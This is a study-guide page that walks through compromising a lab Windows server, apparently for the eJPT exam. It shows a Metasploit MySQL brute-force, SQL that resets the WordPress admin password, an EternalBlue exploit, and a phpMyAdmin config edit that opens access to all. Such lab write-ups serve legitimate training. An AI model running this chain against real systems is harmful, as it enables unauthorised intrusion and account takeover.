> For the complete documentation index, see [llms.txt](https://yashmehta.gitbook.io/ejptv2-cheatsheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yashmehta.gitbook.io/ejptv2-cheatsheet/exploitation/windows-exploitation/mysql.md).

# MySQL

### Here we are exploiting a MySQL database server and changing credentials of wordpress file and then also gaining access to phpmyadmin page

* **Port scanning** with `nmap`

```
nmap -sV 10.2.29.246
# Scans 1000 common ports
```

```
21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

* Access the web server with a browser
  * `http://10.2.29.246/`
  * `http://10.2.29.246/hahaha.jpg`
  * View page source

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-31c957f766c74fc2feba3a1c2b91e70288445de6%252Fimage-20230424104131630.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=e4c87422d18bf565fb32810bb5b4001ef438677a33f158a36e5772d9c99984f0" alt=""><figcaption></figcaption></figure>

* Other webpages
  * `https://10.2.29.246:4848/`
  * `http://10.2.29.246:8080/`
  * `http://10.2.29.246:9200/`
  * `http://10.2.29.246:8484/`
  * `http://10.2.29.246:8585/`
    * `http://10.2.29.246:8585/wordpress/`

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-3128dd32645f2f280a455ac0655eb0aa134b9c2f%252F2023-04-24_10-43.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=e0007e0480c663f42290dbfe612a2ea2f9e6d4addecb81488bec96c14f4792cd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-e1437cf5bc6e1c753fc3ebc5e98d9e8ab7d40f94%252Fimage-20230424104537872.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=92428f8433f786e3d1ea29fc7ac8b5e95accb5607eae3a1f41047d0199f0faf6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-c3482b4365ebfe36f819974d41e42faa373641b3%252Fimage-20230424104621790.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=885117c08193a11a6720dcf3b2c75d88795c1957587c8031b20c14d6059ba5c9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-5e8d7fc39b744486ed03c68c41120f540288bc34%252Fimage-20230424104905042.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=f2da9a60afabf31295dda441a7bf10406736dbe05410226cfc7164b98fad3e3a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-0b80707c22968786522b84a463599cccf1e4ebfa%252Fimage-20230424105003233.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=0b884f4be406d650d07229048d957cfca96c02a7c60e757ca7870d859ae042bc" alt=""><figcaption></figcaption></figure>

## #MySQL

```
nmap -sV -sC -p 3306,8585 10.2.26.45
```

```
3306/tcp open  mysql   MySQL 5.5.20-log
8585/tcp open  http    Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-b1e18f048a88c727fc6de56fda45b19d4798106e%252Fimage-20230424122710148.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=da87b1070fed4e23d2781449d4e59d4df3bc84bb7abc96cf07fc07ee3ad56269" alt=""><figcaption></figcaption></figure>

* Search for MySQL exploits

```
searchsploit MySQL 5.5
# There are only Privilege Escalation exploits
```

* **Brute-force MySQL**

```
msfconsole
```

```
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run
```

```
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'
```

> 📌 `root` password is empty

```
mysql -u root -p -h 10.2.26.45
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-fe54c878b064093f044c1cf55e2bd4dd194a847c%252Fimage-20230424123437314.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=5b6afd56c03effa499c235414dc5faa64e80353d5c5683ced43a7aad741ec6a2" alt=""><figcaption></figcaption></figure>

```
show databases;
use wordpress;
show tables;
select * from wp_users;
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-42c56d7ebd0d7c4c6cb511968e627b8e2f8cbb6d%252Fimage-20230424124316970.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=61bd678d07f1452749288efa905f6fbb2b610a7eafe520528359a463d4334efb" alt=""><figcaption></figcaption></figure>

* Change `admin` WordPress user's password

> ❗ **DO NOT Change passwords in a real pentest**

```
UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
```

* Access via browser
  * `http://10.2.26.45:8585/wordpress/wp-admin`

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-519009f3f5da315d36841e13f6bbf1c44ba68be3%252Fimage-20230424124518055.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=ffff3d44c55ec8f24b7bd99c66aa72f43cdee09d00406bff1bfa7fb62a089bfb" alt=""><figcaption></figcaption></figure>

* Try to gain access to **phpMyAdmin** using MSF
  * Access the target through SMB and modify phpMyAdmin configuration file

```
# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run
```

```
sysinfo
```

* Move into the `wamp` folder

```
cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-bb5b34839fd3994ed6b13a4bf7ae1275aedcf73f%252Fimage-20230424124543517.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=bff6029e561bb72550f3e805a037a23fb475ed1540675117b189463ac501e63f" alt=""><figcaption></figcaption></figure>

* Change WordPress `admin` password

```
cd C:\\wamp\\alias
download phpmyadmin.conf

# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
	Allow from all

# Write and close
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-eecb426042cf811f46b3c01da7f3920b98e33fad%252Fimage-20230424125503330.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=defbc726f3ed5656cd311213476cb73de22cd5f04051ba6bcf55fd3f995ecac0" alt=""><figcaption><p>phpmyadmin.conf</p></figcaption></figure>

```
# In the MSFconsole
upload phpmyadmin.conf

# Apache service must be restarted
shell
net stop wampapache
net start wampapache
```

* Access phpMyAdmin
  * `http://10.2.26.45:8585/phpmyadmin/`
  * it automatically logs in since the `root` password is `null`

phpMyAdmin

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-ab927bd2b7cd8c10b44875212ea204a7657f902b%252Fimage-20230424125807006.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=e01c6d79e75f6676ef49039ec278067224e3483b1bc5e8275df7d05c872555fa" alt=""><figcaption></figcaption></figure>

> ❗ **DO NOT Change passwords in a real pentest**
